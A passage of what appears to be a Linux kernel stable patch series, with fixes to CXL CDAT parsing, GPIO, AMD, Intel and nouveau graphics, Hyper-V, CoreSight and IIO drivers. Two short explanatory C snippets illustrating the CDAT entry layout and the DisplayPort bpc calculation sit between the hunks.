+ 	dev_dbg(dev, "CDAT length %zu\n", *length);
+ 
+ 	return 0;
+@@ -542,13 +542,13 @@ static int cxl_cdat_read_table(struct device *dev,
+ 			       struct cxl_cdat *cdat)
+ {
+ 	size_t length = cdat->length;
+-	u32 *data = cdat->table;
++	__le32 *data = cdat->table;
+ 	int entry_handle = 0;
+ 
+ 	do {
+ 		DECLARE_CDAT_DOE_TASK(CDAT_DOE_REQ(entry_handle), t);
++		struct cdat_entry_header *entry;
+ 		size_t entry_dw;
+-		u32 *entry;
+ 		int rc;
+ 
+ 		rc = pci_doe_submit_task(cdat_doe, &t.task);
+@@ -557,26 +557,34 @@ static int cxl_cdat_read_table(struct device *dev,
+ 			return rc;
+ 		}
+ 		wait_for_completion(&t.c);
+-		/* 1 DW header + 1 DW data min */
+-		if (t.task.rv < (2 * sizeof(u32)))
++
++		/* 1 DW Table Access Response Header + CDAT entry */
++		entry = (struct cdat_entry_header *)(t.response_pl + 1);
++		if ((entry_handle == 0 &&
++		     t.task.rv != sizeof(__le32) + sizeof(struct cdat_header)) ||
++		    (entry_handle > 0 &&
++		     (t.task.rv < sizeof(__le32) + sizeof(*entry) ||
++		      t.task.rv != sizeof(__le32) + le16_to_cpu(entry->length))))
+ 			return -EIO;
+ 
+ 		/* Get the CXL table access header entry handle */
+ 		entry_handle = FIELD_GET(CXL_DOE_TABLE_ACCESS_ENTRY_HANDLE,
+-					 t.response_pl[0]);
+-		entry = t.response_pl + 1;
+-		entry_dw = t.task.rv / sizeof(u32);
++					 le32_to_cpu(t.response_pl[0]));
++		entry_dw = t.task.rv / sizeof(__le32);
+ 		/* Skip Header */
+ 		entry_dw -= 1;
+-		entry_dw = min(length / sizeof(u32), entry_dw);
++		entry_dw = min(length / sizeof(__le32), entry_dw);
+ 		/* Prevent length < 1 DW from causing a buffer overflow */
+ 		if (entry_dw) {
+-			memcpy(data, entry, entry_dw * sizeof(u32));
+-			length -= entry_dw * sizeof(u32);
++			memcpy(data, entry, entry_dw * sizeof(__le32));
++			length -= entry_dw * sizeof(__le32);
+ 			data += entry_dw;
+ 		}
+ 	} while (entry_handle != CXL_DOE_TABLE_ACCESS_LAST_ENTRY);
+ 
++	/* Length in CDAT header may exceed concatenation of CDAT entries */
++	cdat->length -= length;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/cxl/cxlpci.h b/drivers/cxl/cxlpci.h
+index 920909791bb94..104ad2b725163 100644
+--- a/drivers/cxl/cxlpci.h
++++ b/drivers/cxl/cxlpci.h
+@@ -62,6 +62,20 @@ enum cxl_regloc_type {
+ 	CXL_REGLOC_RBI_TYPES
+ };
+ 
++struct cdat_header {
++	__le32 length;
++	u8 revision;
++	u8 checksum;
++	u8 reserved[6];
++	__le32 sequence;
++} __packed;
++
++struct cdat_entry_header {
++	u8 type;
++	u8 reserved;
++	__le16 length;
++} __packed;
++
+ int devm_cxl_port_enumerate_dports(struct cxl_port *port);
+ struct cxl_dev_state;
+ int cxl_hdm_decode_init(struct cxl_dev_state *cxlds, struct cxl_hdm *cxlhdm);
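
The new structs give the CDAT response a typed layout so lengths can be validated per entry. An illustrative userspace parse of the same wire format, using le16toh as a stand-in for the kernel's le16_to_cpu:

#include <endian.h>
#include <stdint.h>
#include <stdio.h>

struct cdat_entry_header {
	uint8_t  type;
	uint8_t  reserved;
	uint16_t length; /* little-endian on the wire */
} __attribute__((packed));

static void dump_entry(const void *buf)
{
	const struct cdat_entry_header *e = buf;

	/* Convert at the access site so checks work on any host byte order. */
	printf("type %u, length %u\n", e->type, le16toh(e->length));
}
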
+diff --git a/drivers/gpio/Kconfig b/drivers/gpio/Kconfig
+index e9917a45b005a..42e5042d01495 100644
+--- a/drivers/gpio/Kconfig
++++ b/drivers/gpio/Kconfig
+@@ -100,7 +100,7 @@ config GPIO_GENERIC
+ 	tristate
+ 
+ config GPIO_REGMAP
+-	depends on REGMAP
++	select REGMAP
+ 	tristate
+ 
+ # put drivers in the right section, in alphabetical order
+diff --git a/drivers/gpio/gpio-davinci.c b/drivers/gpio/gpio-davinci.c
+index fa51a91afa54f..7a26919ff127b 100644
+--- a/drivers/gpio/gpio-davinci.c
++++ b/drivers/gpio/gpio-davinci.c
+@@ -325,7 +325,7 @@ static struct irq_chip gpio_irqchip = {
+ 	.irq_enable	= gpio_irq_enable,
+ 	.irq_disable	= gpio_irq_disable,
+ 	.irq_set_type	= gpio_irq_type,
+-	.flags		= IRQCHIP_SET_TYPE_MASKED,
++	.flags		= IRQCHIP_SET_TYPE_MASKED | IRQCHIP_SKIP_SET_WAKE,
+ };
+ 
+ static void gpio_irq_handler(struct irq_desc *desc)
+@@ -642,9 +642,6 @@ static void davinci_gpio_save_context(struct davinci_gpio_controller *chips,
+ 		context->set_falling = readl_relaxed(&g->set_falling);
+ 	}
+ 
+-	/* Clear Bank interrupt enable bit */
+-	writel_relaxed(0, base + BINTEN);
+-
+ 	/* Clear all interrupt status registers */
+ 	writel_relaxed(GENMASK(31, 0), &g->intstat);
+ }
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index d5e14a3aa05dd..3dac1e139c5f3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -3045,6 +3045,24 @@ static int amdgpu_device_ip_suspend_phase2(struct amdgpu_device *adev)
+ 		     adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_MES))
+ 			continue;
+ 
++		/* SDMA 5.x+ is part of GFX power domain so it's covered by GFXOFF */
++		if (adev->in_s0ix &&
++		    (adev->ip_versions[SDMA0_HWIP][0] >= IP_VERSION(5, 0, 0)) &&
++		    (adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_SDMA))
++			continue;
++
++		/* During cold boot, swPSP provides the IMU and RLC FW binaries to TOS.
++		 * These are in TMR, hence are expected to be reused by PSP-TOS to reload
++		 * from this location and RLC Autoload automatically also gets loaded
++		 * from here based on PMFW -> PSP message during re-init sequence.
++		 * Therefore, the psp suspend & resume should be skipped to avoid destroy
++		 * the TMR and reload FWs again for IMU enabled APU ASICs.
++		 */
++		if (amdgpu_in_reset(adev) &&
++		    (adev->flags & AMD_IS_APU) && adev->gfx.imu.funcs &&
++		    adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_PSP)
++			continue;
++
+ 		/* XXX handle errors */
+ 		r = adev->ip_blocks[i].version->funcs->suspend(adev);
+ 		/* XXX handle errors */
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 8661de32d80a5..7fa1728384bfd 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -2183,6 +2183,8 @@ static int detect_mst_link_for_all_connectors(struct drm_device *dev)
+ 				DRM_ERROR("DM_MST: Failed to start MST\n");
+ 				aconnector->dc_link->type =
+ 					dc_connection_single;
++				ret = dm_helpers_dp_mst_stop_top_mgr(aconnector->dc_link->ctx,
++								     aconnector->dc_link);
+ 				break;
+ 			}
+ 		}
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611.c b/drivers/gpu/drm/bridge/lontium-lt9611.c
+index 3b77238ca4aff..ae8c6d9d4095f 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611.c
+@@ -258,6 +258,7 @@ static int lt9611_pll_setup(struct lt9611 *lt9611, const struct drm_display_mode
+ 		{ 0x8126, 0x55 },
+ 		{ 0x8127, 0x66 },
+ 		{ 0x8128, 0x88 },
++		{ 0x812a, 0x20 },
+ 	};
+ 
+ 	regmap_multi_reg_write(lt9611->regmap, reg_cfg, ARRAY_SIZE(reg_cfg));
+diff --git a/drivers/gpu/drm/i915/display/intel_color.c b/drivers/gpu/drm/i915/display/intel_color.c
+index c3928d28cd443..85a38d794dd9f 100644
+--- a/drivers/gpu/drm/i915/display/intel_color.c
++++ b/drivers/gpu/drm/i915/display/intel_color.c
+@@ -46,6 +46,11 @@ struct intel_color_funcs {
+ 	 * registers involved with the same commit.
+ 	 */
+ 	void (*color_commit_arm)(const struct intel_crtc_state *crtc_state);
++	/*
++	 * Perform any extra tasks needed after all the
++	 * double buffered registers have been latched.
++	 */
++	void (*color_post_update)(const struct intel_crtc_state *crtc_state);
+ 	/*
+ 	 * Load LUTs (and other single buffered color management
+ 	 * registers). Will (hopefully) be called during the vblank
+@@ -1220,6 +1225,24 @@ void intel_color_commit_arm(const struct intel_crtc_state *crtc_state)
+ 	i915->display.funcs.color->color_commit_arm(crtc_state);
+ }
+ 
++void intel_color_post_update(const struct intel_crtc_state *crtc_state)
++{
++	struct drm_i915_private *i915 = to_i915(crtc_state->uapi.crtc->dev);
++
++	if (i915->display.funcs.color->color_post_update)
++		i915->display.funcs.color->color_post_update(crtc_state);
++}
++
++void intel_color_prepare_commit(struct intel_crtc_state *crtc_state)
++{
++	intel_dsb_prepare(crtc_state);
++}
++
++void intel_color_cleanup_commit(struct intel_crtc_state *crtc_state)
++{
++	intel_dsb_cleanup(crtc_state);
++}
++
+ static bool intel_can_preload_luts(const struct intel_crtc_state *new_crtc_state)
+ {
+ 	struct intel_crtc *crtc = to_intel_crtc(new_crtc_state->uapi.crtc);
+diff --git a/drivers/gpu/drm/i915/display/intel_color.h b/drivers/gpu/drm/i915/display/intel_color.h
+index 2a5ada67774d0..0256f49c3910d 100644
+--- a/drivers/gpu/drm/i915/display/intel_color.h
++++ b/drivers/gpu/drm/i915/display/intel_color.h
+@@ -17,8 +17,11 @@ void intel_color_init_hooks(struct drm_i915_private *i915);
+ int intel_color_init(struct drm_i915_private *i915);
+ void intel_color_crtc_init(struct intel_crtc *crtc);
+ int intel_color_check(struct intel_crtc_state *crtc_state);
++void intel_color_prepare_commit(struct intel_crtc_state *crtc_state);
++void intel_color_cleanup_commit(struct intel_crtc_state *crtc_state);
+ void intel_color_commit_noarm(const struct intel_crtc_state *crtc_state);
+ void intel_color_commit_arm(const struct intel_crtc_state *crtc_state);
++void intel_color_post_update(const struct intel_crtc_state *crtc_state);
+ void intel_color_load_luts(const struct intel_crtc_state *crtc_state);
+ void intel_color_get_config(struct intel_crtc_state *crtc_state);
+ int intel_color_get_gamma_bit_precision(const struct intel_crtc_state *crtc_state);
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index f0aad2403109b..2d46dcf820a23 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -93,7 +93,6 @@
+ #include "intel_dp_link_training.h"
+ #include "intel_dpio_phy.h"
+ #include "intel_dpt.h"
+-#include "intel_dsb.h"
+ #include "intel_fbc.h"
+ #include "intel_fbdev.h"
+ #include "intel_fdi.h"
+@@ -1264,6 +1263,9 @@ static void intel_post_plane_update(struct intel_atomic_state *state,
+ 	if (needs_cursorclk_wa(old_crtc_state) &&
+ 	    !needs_cursorclk_wa(new_crtc_state))
+ 		icl_wa_cursorclkgating(dev_priv, pipe, false);
++
++	if (intel_crtc_needs_color_update(new_crtc_state))
++		intel_color_post_update(new_crtc_state);
+ }
+ 
+ static void intel_crtc_enable_flip_done(struct intel_atomic_state *state,
+@@ -6946,7 +6948,7 @@ static int intel_atomic_prepare_commit(struct intel_atomic_state *state)
+ 
+ 	for_each_new_intel_crtc_in_state(state, crtc, crtc_state, i) {
+ 		if (intel_crtc_needs_color_update(crtc_state))
+-			intel_dsb_prepare(crtc_state);
++			intel_color_prepare_commit(crtc_state);
+ 	}
+ 
+ 	return 0;
+@@ -7399,24 +7401,18 @@ static void intel_atomic_commit_fence_wait(struct intel_atomic_state *intel_stat
+ 		    &wait_reset);
+ }
+ 
+-static void intel_cleanup_dsbs(struct intel_atomic_state *state)
+-{
+-	struct intel_crtc_state *old_crtc_state, *new_crtc_state;
+-	struct intel_crtc *crtc;
+-	int i;
+-
+-	for_each_oldnew_intel_crtc_in_state(state, crtc, old_crtc_state,
+-					    new_crtc_state, i)
+-		intel_dsb_cleanup(old_crtc_state);
+-}
+-
+ static void intel_atomic_cleanup_work(struct work_struct *work)
+ {
+ 	struct intel_atomic_state *state =
+ 		container_of(work, struct intel_atomic_state, base.commit_work);
+ 	struct drm_i915_private *i915 = to_i915(state->base.dev);
++	struct intel_crtc_state *old_crtc_state;
++	struct intel_crtc *crtc;
++	int i;
++
++	for_each_old_intel_crtc_in_state(state, crtc, old_crtc_state, i)
++		intel_color_cleanup_commit(old_crtc_state);
+ 
+-	intel_cleanup_dsbs(state);
+ 	drm_atomic_helper_cleanup_planes(&i915->drm, &state->base);
+ 	drm_atomic_helper_commit_cleanup_done(&state->base);
+ 	drm_atomic_state_put(&state->base);
+@@ -7624,6 +7620,8 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 		 * DSB cleanup is done in cleanup_work aligning with framebuffer
+ 		 * cleanup. So copy and reset the dsb structure to sync with
+ 		 * commit_done and later do dsb cleanup in cleanup_work.
++		 *
++		 * FIXME get rid of this funny new->old swapping
+ 		 */
+ 		old_crtc_state->dsb = fetch_and_zero(&new_crtc_state->dsb);
+ 	}
+@@ -7774,7 +7772,7 @@ static int intel_atomic_commit(struct drm_device *dev,
+ 		i915_sw_fence_commit(&state->commit_ready);
+ 
+ 		for_each_new_intel_crtc_in_state(state, crtc, new_crtc_state, i)
+-			intel_dsb_cleanup(new_crtc_state);
++			intel_color_cleanup_commit(new_crtc_state);
+ 
+ 		drm_atomic_helper_cleanup_planes(dev, &state->base);
+ 		intel_runtime_pm_put(&dev_priv->runtime_pm, state->wakeref);
+diff --git a/drivers/gpu/drm/i915/display/intel_display.h b/drivers/gpu/drm/i915/display/intel_display.h
+index 714030136b7f2..ef73730f32b09 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.h
++++ b/drivers/gpu/drm/i915/display/intel_display.h
+@@ -440,6 +440,14 @@ enum hpd_pin {
+ 	     (__i)++) \
+ 		for_each_if(plane)
+ 
++#define for_each_old_intel_crtc_in_state(__state, crtc, old_crtc_state, __i) \
++	for ((__i) = 0; \
++	     (__i) < (__state)->base.dev->mode_config.num_crtc && \
++		     ((crtc) = to_intel_crtc((__state)->base.crtcs[__i].ptr), \
++		      (old_crtc_state) = to_intel_crtc_state((__state)->base.crtcs[__i].old_state), 1); \
++	     (__i)++) \
++		for_each_if(crtc)
++
+ #define for_each_new_intel_plane_in_state(__state, plane, new_plane_state, __i) \
+ 	for ((__i) = 0; \
+ 	     (__i) < (__state)->base.dev->mode_config.num_total_plane && \
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index 3c573d41d4046..eefd327c42782 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -2018,6 +2018,8 @@ process_csb(struct intel_engine_cs *engine, struct i915_request **inactive)
+ 	 * inspecting the queue to see if we need to resumbit.
+ 	 */
+ 	if (*prev != *execlists->active) { /* elide lite-restores */
++		struct intel_context *prev_ce = NULL, *active_ce = NULL;
++
+ 		/*
+ 		 * Note the inherent discrepancy between the HW runtime,
+ 		 * recorded as part of the context switch, and the CPU
+@@ -2029,9 +2031,15 @@ process_csb(struct intel_engine_cs *engine, struct i915_request **inactive)
+ 		 * and correct overselves later when updating from HW.
+ 		 */
+ 		if (*prev)
+-			lrc_runtime_stop((*prev)->context);
++			prev_ce = (*prev)->context;
+ 		if (*execlists->active)
+-			lrc_runtime_start((*execlists->active)->context);
++			active_ce = (*execlists->active)->context;
++		if (prev_ce != active_ce) {
++			if (prev_ce)
++				lrc_runtime_stop(prev_ce);
++			if (active_ce)
++				lrc_runtime_start(active_ce);
++		}
+ 		new_timeslice(execlists);
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_huc.c b/drivers/gpu/drm/i915/gt/uc/intel_huc.c
+index 410905da8e974..0c103ca160d10 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_huc.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_huc.c
+@@ -235,6 +235,13 @@ static void delayed_huc_load_fini(struct intel_huc *huc)
+ 	i915_sw_fence_fini(&huc->delayed_load.fence);
+ }
+ 
++int intel_huc_sanitize(struct intel_huc *huc)
++{
++	delayed_huc_load_complete(huc);
++	intel_uc_fw_sanitize(&huc->fw);
++	return 0;
++}
++
+ static bool vcs_supported(struct intel_gt *gt)
+ {
+ 	intel_engine_mask_t mask = gt->info.engine_mask;
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_huc.h b/drivers/gpu/drm/i915/gt/uc/intel_huc.h
+index 52db03620c609..db555b3c1f562 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_huc.h
++++ b/drivers/gpu/drm/i915/gt/uc/intel_huc.h
+@@ -41,6 +41,7 @@ struct intel_huc {
+ 	} delayed_load;
+ };
+ 
++int intel_huc_sanitize(struct intel_huc *huc);
+ void intel_huc_init_early(struct intel_huc *huc);
+ int intel_huc_init(struct intel_huc *huc);
+ void intel_huc_fini(struct intel_huc *huc);
+@@ -54,12 +55,6 @@ bool intel_huc_is_authenticated(struct intel_huc *huc);
+ void intel_huc_register_gsc_notifier(struct intel_huc *huc, struct bus_type *bus);
+ void intel_huc_unregister_gsc_notifier(struct intel_huc *huc, struct bus_type *bus);
+ 
+-static inline int intel_huc_sanitize(struct intel_huc *huc)
+-{
+-	intel_uc_fw_sanitize(&huc->fw);
+-	return 0;
+-}
+-
+ static inline bool intel_huc_is_supported(struct intel_huc *huc)
+ {
+ 	return intel_uc_fw_is_supported(&huc->fw);
+diff --git a/drivers/gpu/drm/i915/i915_perf.c b/drivers/gpu/drm/i915/i915_perf.c
+index 7d5e2c53c23a7..1a1b74b80e080 100644
+--- a/drivers/gpu/drm/i915/i915_perf.c
++++ b/drivers/gpu/drm/i915/i915_perf.c
+@@ -4612,13 +4612,13 @@ int i915_perf_add_config_ioctl(struct drm_device *dev, void *data,
+ 		err = oa_config->id;
+ 		goto sysfs_err;
+ 	}
+-
+-	mutex_unlock(&perf->metrics_lock);
++	id = oa_config->id;
+ 
+ 	drm_dbg(&perf->i915->drm,
+ 		"Added config %s id=%i\n", oa_config->uuid, oa_config->id);
++	mutex_unlock(&perf->metrics_lock);
+ 
+-	return oa_config->id;
++	return id;
+ 
+ sysfs_err:
+ 	mutex_unlock(&perf->metrics_lock);
+diff --git a/drivers/gpu/drm/nouveau/dispnv50/disp.c b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+index ed9d374147b8d..5bb777ff13130 100644
+--- a/drivers/gpu/drm/nouveau/dispnv50/disp.c
++++ b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+@@ -363,6 +363,35 @@ nv50_outp_atomic_check_view(struct drm_encoder *encoder,
+ 	return 0;
+ }
+ 
++static void
++nv50_outp_atomic_fix_depth(struct drm_encoder *encoder, struct drm_crtc_state *crtc_state)
++{
++	struct nv50_head_atom *asyh = nv50_head_atom(crtc_state);
++	struct nouveau_encoder *nv_encoder = nouveau_encoder(encoder);
++	struct drm_display_mode *mode = &asyh->state.adjusted_mode;
++	unsigned int max_rate, mode_rate;
++
++	switch (nv_encoder->dcb->type) {
++	case DCB_OUTPUT_DP:
++		max_rate = nv_encoder->dp.link_nr * nv_encoder->dp.link_bw;
++
++		/* we don't support more than 10 anyway */
++		asyh->or.bpc = min_t(u8, asyh->or.bpc, 10);
++
++		/* reduce the bpc until it works out */
++		while (asyh->or.bpc > 6) {
++			mode_rate = DIV_ROUND_UP(mode->clock * asyh->or.bpc * 3, 8);
++			if (mode_rate <= max_rate)
++				break;
++
++			asyh->or.bpc -= 2;
++		}
++		break;
++	default:
++		break;
++	}
++}
++
+ static int
+ nv50_outp_atomic_check(struct drm_encoder *encoder,
+ 		       struct drm_crtc_state *crtc_state,
+@@ -381,6 +410,9 @@ nv50_outp_atomic_check(struct drm_encoder *encoder,
+ 	if (crtc_state->mode_changed || crtc_state->connectors_changed)
+ 		asyh->or.bpc = connector->display_info.bpc;
+ 
++	/* We might have to reduce the bpc */
++	nv50_outp_atomic_fix_depth(encoder, crtc_state);
++
+ 	return 0;
+ }
+ 
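nv50_outp_atomic_fix_depth() above walks the bpc down in steps of two until the mode's data rate fits the DP link. The same arithmetic as a standalone helper (units follow the patch: a rate proportional to clock * bpc * 3 / 8):

#define DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d))

static unsigned int fit_bpc(unsigned int clock, unsigned int max_rate,
			    unsigned int bpc)
{
	if (bpc > 10)
		bpc = 10; /* more than 10 bpc is not supported anyway */

	while (bpc > 6) {
		/* data rate: pixel clock * 3 components * bpc bits / 8 */
		unsigned int mode_rate = DIV_ROUND_UP(clock * bpc * 3, 8);

		if (mode_rate <= max_rate)
			break;
		bpc -= 2;
	}
	return bpc;
}
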
+diff --git a/drivers/gpu/drm/nouveau/nouveau_dp.c b/drivers/gpu/drm/nouveau/nouveau_dp.c
+index e00876f92aeea..d49b4875fc3c9 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_dp.c
++++ b/drivers/gpu/drm/nouveau/nouveau_dp.c
+@@ -263,8 +263,6 @@ nouveau_dp_irq(struct work_struct *work)
+ }
+ 
+ /* TODO:
+- * - Use the minimum possible BPC here, once we add support for the max bpc
+- *   property.
+  * - Validate against the DP caps advertised by the GPU (we don't check these
+  *   yet)
+  */
+@@ -276,7 +274,11 @@ nv50_dp_mode_valid(struct drm_connector *connector,
+ {
+ 	const unsigned int min_clock = 25000;
+ 	unsigned int max_rate, mode_rate, ds_max_dotclock, clock = mode->clock;
+-	const u8 bpp = connector->display_info.bpc * 3;
++	/* Always check with the minimum bpc, so we can advertise better modes.
++	 * In particular, not doing this causes modes to be dropped on HDR
++	 * displays, as we might otherwise check with a bpc as high as 16.
++	 */
++	const u8 bpp = 6 * 3;
+ 
+ 	if (mode->flags & DRM_MODE_FLAG_INTERLACE && !outp->caps.dp_interlace)
+ 		return MODE_NO_INTERLACE;
+diff --git a/drivers/gpu/drm/panfrost/panfrost_mmu.c b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+index 666a5e53fe193..e961fa27702ce 100644
+--- a/drivers/gpu/drm/panfrost/panfrost_mmu.c
++++ b/drivers/gpu/drm/panfrost/panfrost_mmu.c
+@@ -504,6 +504,7 @@ static int panfrost_mmu_map_fault_addr(struct panfrost_device *pfdev, int as,
+ 		if (IS_ERR(pages[i])) {
+ 			mutex_unlock(&bo->base.pages_lock);
+ 			ret = PTR_ERR(pages[i]);
++			pages[i] = NULL;
+ 			goto err_pages;
+ 		}
+ 	}
+diff --git a/drivers/hv/connection.c b/drivers/hv/connection.c
+index 9dc27e5d367a2..da51b50787dff 100644
+--- a/drivers/hv/connection.c
++++ b/drivers/hv/connection.c
+@@ -409,6 +409,10 @@ void vmbus_disconnect(void)
+  */
+ struct vmbus_channel *relid2channel(u32 relid)
+ {
++	if (vmbus_connection.channels == NULL) {
++		pr_warn_once("relid2channel: relid=%d: No channels mapped!\n", relid);
++		return NULL;
++	}
+ 	if (WARN_ON(relid >= MAX_CHANNEL_RELIDS))
+ 		return NULL;
+ 	return READ_ONCE(vmbus_connection.channels[relid]);
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x-core.c b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+index 77bca6932f017..a65b41017cec2 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x-core.c
++++ b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+@@ -454,7 +454,7 @@ static int etm4_enable_hw(struct etmv4_drvdata *drvdata)
+ 		if (etm4x_sspcicrn_present(drvdata, i))
+ 			etm4x_relaxed_write32(csa, config->ss_pe_cmp[i], TRCSSPCICRn(i));
+ 	}
+-	for (i = 0; i < drvdata->nr_addr_cmp; i++) {
++	for (i = 0; i < drvdata->nr_addr_cmp * 2; i++) {
+ 		etm4x_relaxed_write64(csa, config->addr_val[i], TRCACVRn(i));
+ 		etm4x_relaxed_write64(csa, config->addr_acc[i], TRCACATRn(i));
+ 	}
+@@ -1013,25 +1013,21 @@ static bool etm4_init_iomem_access(struct etmv4_drvdata *drvdata,
+ 				   struct csdev_access *csa)
+ {
+ 	u32 devarch = readl_relaxed(drvdata->base + TRCDEVARCH);
+-	u32 idr1 = readl_relaxed(drvdata->base + TRCIDR1);
+ 
+ 	/*
+ 	 * All ETMs must implement TRCDEVARCH to indicate that
+-	 * the component is an ETMv4. To support any broken
+-	 * implementations we fall back to TRCIDR1 check, which
+-	 * is not really reliable.
++	 * the component is an ETMv4. Even though TRCIDR1 also
++	 * contains the information, it is part of the "Trace"
++	 * register and must be accessed with the OSLK cleared,
++	 * with MMIO. But we cannot touch the OSLK until we are
++	 * sure this is an ETM. So rely only on the TRCDEVARCH.
+ 	 */
+-	if ((devarch & ETM_DEVARCH_ID_MASK) == ETM_DEVARCH_ETMv4x_ARCH) {
+-		drvdata->arch = etm_devarch_to_arch(devarch);
+-	} else {
+-		pr_warn("CPU%d: ETM4x incompatible TRCDEVARCH: %x, falling back to TRCIDR1\n",
+-			smp_processor_id(), devarch);
+-
+-		if (ETM_TRCIDR1_ARCH_MAJOR(idr1) != ETM_TRCIDR1_ARCH_ETMv4)
+-			return false;
+-		drvdata->arch = etm_trcidr_to_arch(idr1);
++	if ((devarch & ETM_DEVARCH_ID_MASK) != ETM_DEVARCH_ETMv4x_ARCH) {
++		pr_warn_once("TRCDEVARCH doesn't match ETMv4 architecture\n");
++		return false;
+ 	}
+ 
++	drvdata->arch = etm_devarch_to_arch(devarch);
+ 	*csa = CSDEV_ACCESS_IOMEM(drvdata->base);
+ 	return true;
+ }
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x.h b/drivers/hwtracing/coresight/coresight-etm4x.h
+index 4b21bb79f1682..0174fbf1a9637 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x.h
++++ b/drivers/hwtracing/coresight/coresight-etm4x.h
+@@ -753,14 +753,12 @@
+  * TRCDEVARCH	- CoreSight architected register
+  *                - Bits[15:12] - Major version
+  *                - Bits[19:16] - Minor version
+- * TRCIDR1	- ETM architected register
+- *                - Bits[11:8] - Major version
+- *                - Bits[7:4]  - Minor version
+- * We must rely on TRCDEVARCH for the version information,
+- * however we don't want to break the support for potential
+- * old implementations which might not implement it. Thus
+- * we fall back to TRCIDR1 if TRCDEVARCH is not implemented
+- * for memory mapped components.
++ *
++ * We must rely only on TRCDEVARCH for the version information. Even though
++ * TRCIDR1 also provides the architecture version, it is a "Trace" register
++ * and as such must be accessed only with Trace power domain ON. This may
++ * not be available at probe time.
++ *
+  * Now to make certain decisions easier based on the version
+  * we use an internal representation of the version in the
+  * driver, as follows :
+@@ -786,12 +784,6 @@ static inline u8 etm_devarch_to_arch(u32 devarch)
+ 				ETM_DEVARCH_REVISION(devarch));
+ }
+ 
+-static inline u8 etm_trcidr_to_arch(u32 trcidr1)
+-{
+-	return ETM_ARCH_VERSION(ETM_TRCIDR1_ARCH_MAJOR(trcidr1),
+-				ETM_TRCIDR1_ARCH_MINOR(trcidr1));
+-}
+-
+ enum etm_impdef_type {
+ 	ETM4_IMPDEF_HISI_CORE_COMMIT,
+ 	ETM4_IMPDEF_FEATURE_MAX,
+diff --git a/drivers/iio/accel/kionix-kx022a.c b/drivers/iio/accel/kionix-kx022a.c
+index f866859855cdd..1c3a72380fb85 100644
+--- a/drivers/iio/accel/kionix-kx022a.c
++++ b/drivers/iio/accel/kionix-kx022a.c
+@@ -864,7 +864,7 @@ static irqreturn_t kx022a_trigger_handler(int irq, void *p)
+ 	if (ret < 0)
+ 		goto err_read;
+ 
+-	iio_push_to_buffers_with_timestamp(idev, data->buffer, pf->timestamp);
++	iio_push_to_buffers_with_timestamp(idev, data->buffer, data->timestamp);
+ err_read:
+ 	iio_trigger_notify_done(idev->trig);
+ 
+diff --git a/drivers/iio/adc/ad7791.c b/drivers/iio/adc/ad7791.c
+index fee8d129a5f08..86effe8501b44 100644
+--- a/drivers/iio/adc/ad7791.c
++++ b/drivers/iio/adc/ad7791.c
+@@ -253,7 +253,7 @@ static const struct ad_sigma_delta_info ad7791_sigma_delta_info = {
+ 	.has_registers = true,
+ 	.addr_shift = 4,
+ 	.read_mask = BIT(3),
+-	.irq_flags = IRQF_TRIGGER_LOW,
++	.irq_flags = IRQF_TRIGGER_FALLING,
+ };
+ 
+ static int ad7791_read_raw(struct iio_dev *indio_dev,
+diff --git a/drivers/iio/adc/ltc2497.c b/drivers/iio/adc/ltc2497.c
+index 17370c5eb6fe3..ec198c6f13d6b 100644
+--- a/drivers/iio/adc/ltc2497.c
++++ b/drivers/iio/adc/ltc2497.c
+@@ -28,7 +28,6 @@ struct ltc2497_driverdata {
+ 	struct ltc2497core_driverdata common_ddata;
+ 	struct i2c_client *client;
+ 	u32 recv_size;
+-	u32 sub_lsb;
+ 	/*
+ 	 * DMA (thus cache coherency maintenance) may require the
+ 	 * transfer buffers to live in their own cache lines.
+@@ -65,10 +64,10 @@ static int ltc2497_result_and_measure(struct ltc2497core_driverdata *ddata,
+ 		 * equivalent to a sign extension.
+ 		 */
+ 		if (st->recv_size == 3) {
+-			*val = (get_unaligned_be24(st->data.d8) >> st->sub_lsb)
++			*val = (get_unaligned_be24(st->data.d8) >> 6)
+ 				- BIT(ddata->chip_info->resolution + 1);
+ 		} else {
